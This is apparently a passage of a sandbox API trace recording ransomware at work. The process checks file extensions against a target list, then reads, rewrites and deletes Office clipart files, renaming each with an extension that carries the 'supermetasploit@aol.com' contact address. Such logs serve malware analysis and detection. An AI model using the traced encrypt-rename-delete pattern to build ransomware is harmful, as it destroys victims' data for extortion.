68 [0319.523] lstrlenW (lpString=".doc") returned 4 [0319.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.523] lstrlenW (lpString=".docx") returned 5 [0319.523] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.523] lstrlenW (lpString=".pdf") returned 4 [0319.523] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.523] lstrlenW (lpString=".xls") returned 4 [0319.523] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.523] lstrlenW (lpString=".xlsx") returned 5 [0319.523] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.523] lstrlenW (lpString=".ppt") returned 4 [0319.523] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.523] lstrlenW (lpString=".zip") returned 4 [0319.523] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.523] lstrlenW (lpString=".rar") returned 4 [0319.523] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.523] lstrlenW (lpString=".bz2") returned 4 [0319.523] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.523] lstrlenW (lpString=".7z") returned 3 [0319.523] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.524] lstrlenW (lpString=".dbf") returned 4 [0319.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.524] lstrlenW (lpString=".1cd") returned 4 [0319.524] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.524] lstrlenW (lpString=".jpg") returned 4 [0319.524] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.524] lstrlenW (lpString=".doc") returned 4 [0319.524] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.524] lstrlenW (lpString=".docx") returned 5 [0319.524] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.524] lstrlenW (lpString=".pdf") returned 4 [0319.524] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.524] lstrlenW (lpString=".xls") returned 4 [0319.524] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.524] lstrlenW (lpString=".xlsx") returned 5 [0319.524] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.524] lstrlenW (lpString=".ppt") returned 4 [0319.524] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.524] lstrlenW (lpString=".zip") returned 4 [0319.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.524] lstrlenW (lpString=".rar") returned 4 [0319.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.525] lstrlenW (lpString=".bz2") returned 4 [0319.525] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.525] lstrlenW (lpString=".7z") returned 3 [0319.525] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.525] lstrlenW (lpString=".dbf") returned 4 [0319.525] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.525] lstrlenW (lpString=".1cd") returned 4 [0319.525] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 68 [0319.525] lstrlenW (lpString=".jpg") returned 4 [0319.525] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.525] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.525] lstrlenW (lpString="DD00405_.WMF") returned 12 [0319.525] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.526] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=17584) returned 1 [0319.526] CloseHandle (hObject=0x3b0) returned 1 [0319.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf")) returned 0x220 [0319.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.527] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.527] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0319.528] GetLastError () returned 0x0 [0319.528] ReadFile (in: hFile=0x3b0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x44b0, lpOverlapped=0x0) returned 1 [0319.924] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x44c0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x44c0, lpOverlapped=0x0) returned 1 [0319.926] ReadFile (in: hFile=0x3b0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.926] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.926] SetEndOfFile (hFile=0x488) returned 1 [0319.927] CloseHandle (hObject=0x488) returned 1 [0319.927] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.927] SetEndOfFile (hFile=0x3b0) returned 1 [0319.930] CloseHandle (hObject=0x3b0) returned 1 [0319.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf")) returned 1 [0319.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.932] lstrlenW (lpString=".doc") returned 4 [0319.932] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.932] lstrlenW (lpString=".docx") returned 5 [0319.932] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.932] lstrlenW (lpString=".pdf") returned 4 [0319.932] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.932] lstrlenW (lpString=".xls") returned 4 [0319.932] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.932] lstrlenW (lpString=".xlsx") returned 5 [0319.932] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.932] lstrlenW (lpString=".ppt") returned 4 [0319.932] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.932] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.932] lstrlenW (lpString=".zip") returned 4 [0319.932] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.932] lstrlenW (lpString=".rar") returned 4 [0319.932] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.932] lstrlenW (lpString=".bz2") returned 4 [0319.932] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString=".7z") returned 3 [0319.933] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.933] lstrlenW (lpString=".dbf") returned 4 [0319.933] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.933] lstrlenW (lpString=".1cd") returned 4 [0319.933] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.933] lstrlenW (lpString=".jpg") returned 4 [0319.933] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.933] lstrlenW (lpString=".doc") returned 4 [0319.933] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString=".docx") returned 5 [0319.933] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.933] lstrlenW (lpString=".pdf") returned 4 [0319.933] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString=".xls") returned 4 [0319.933] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.933] lstrlenW (lpString=".xlsx") returned 5 [0319.933] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.933] lstrlenW (lpString=".ppt") returned 4 [0319.933] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.933] lstrlenW (lpString=".zip") returned 4 [0319.933] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.933] lstrlenW (lpString=".rar") returned 4 [0319.933] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString=".bz2") returned 4 [0319.933] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.933] lstrlenW (lpString=".7z") returned 3 [0319.933] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.934] lstrlenW (lpString=".dbf") returned 4 [0319.934] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.934] lstrlenW (lpString=".1cd") returned 4 [0319.934] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0319.934] lstrlenW (lpString=".jpg") returned 4 [0319.934] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.934] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.934] lstrlenW (lpString="DD00705_.WMF") returned 12 [0319.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.935] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=24588) returned 1 [0319.935] CloseHandle (hObject=0x3b0) returned 1 [0319.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf")) returned 0x220 [0319.935] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0319.936] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.936] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0319.937] GetLastError () returned 0x0 [0319.937] ReadFile (in: hFile=0x3b0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x600c, lpOverlapped=0x0) returned 1 [0320.135] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x6010, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x6010, lpOverlapped=0x0) returned 1 [0320.137] ReadFile (in: hFile=0x3b0, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.138] WriteFile (in: hFile=0x488, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.138] SetEndOfFile (hFile=0x488) returned 1 [0320.145] CloseHandle (hObject=0x488) returned 1 [0320.145] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.145] SetEndOfFile (hFile=0x3b0) returned 1 [0320.152] CloseHandle (hObject=0x3b0) returned 1 [0320.152] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf")) returned 1 [0320.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.631] lstrlenW (lpString=".doc") returned 4 [0320.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.631] lstrlenW (lpString=".docx") returned 5 [0320.631] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.631] lstrlenW (lpString=".pdf") returned 4 [0320.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.631] lstrlenW (lpString=".xls") returned 4 [0320.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.631] lstrlenW (lpString=".xlsx") returned 5 [0320.631] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.631] lstrlenW (lpString=".ppt") returned 4 [0320.631] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.632] lstrlenW (lpString=".zip") returned 4 [0320.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.632] lstrlenW (lpString=".rar") returned 4 [0320.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.632] lstrlenW (lpString=".bz2") returned 4 [0320.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.632] lstrlenW (lpString=".7z") returned 3 [0320.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.632] lstrlenW (lpString=".dbf") returned 4 [0320.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.632] lstrlenW (lpString=".1cd") returned 4 [0320.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.632] lstrlenW (lpString=".jpg") returned 4 [0320.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.632] lstrlenW (lpString=".doc") returned 4 [0320.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.632] lstrlenW (lpString=".docx") returned 5 [0320.633] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.633] lstrlenW (lpString=".pdf") returned 4 [0320.633] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0320.633] lstrlenW (lpString=".xls") returned 4 [0320.633] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0320.633] lstrlenW (lpString=".xlsx") returned 5 [0320.633] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0320.633] lstrlenW (lpString=".ppt") returned 4 [0320.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0320.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.633] lstrlenW (lpString=".zip") returned 4 [0320.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0320.633] lstrlenW (lpString=".rar") returned 4 [0320.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0320.633] lstrlenW (lpString=".bz2") returned 4 [0320.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0320.633] lstrlenW (lpString=".7z") returned 3 [0320.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0320.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.633] lstrlenW (lpString=".dbf") returned 4 [0320.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0320.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.633] lstrlenW (lpString=".1cd") returned 4 [0320.634] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0320.634] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0320.634] lstrlenW (lpString=".jpg") returned 4 [0320.634] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0320.634] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0320.634] lstrlenW (lpString="DD01152_.WMF") returned 12 [0320.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0320.635] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=2960) returned 1 [0320.635] CloseHandle (hObject=0x488) returned 1 [0320.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf")) returned 0x220 [0320.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0320.636] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.636] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0320.638] GetLastError () returned 0x0 [0320.638] ReadFile (in: hFile=0x488, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0xb90, lpOverlapped=0x0) returned 1 [0320.640] WriteFile (in: hFile=0x548, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xba0, lpOverlapped=0x0) returned 1 [0320.641] ReadFile (in: hFile=0x488, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.641] WriteFile (in: hFile=0x548, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.642] SetEndOfFile (hFile=0x548) returned 1 [0320.642] CloseHandle (hObject=0x548) returned 1 [0320.642] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.642] SetEndOfFile (hFile=0x488) returned 1 [0320.645] CloseHandle (hObject=0x488) returned 1 [0320.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.646] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01152_.wmf")) returned 1 [0320.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01152_.WMF") returned 68 [0320.647] lstrlenW (lpString=".doc") returned 4 [0320.647] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0320.647] lstrlenW (lpString=".docx") returned 5 [0320.647] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0320.647] lstrlenW (lpString=".pdf") returned 4 [0320.647] 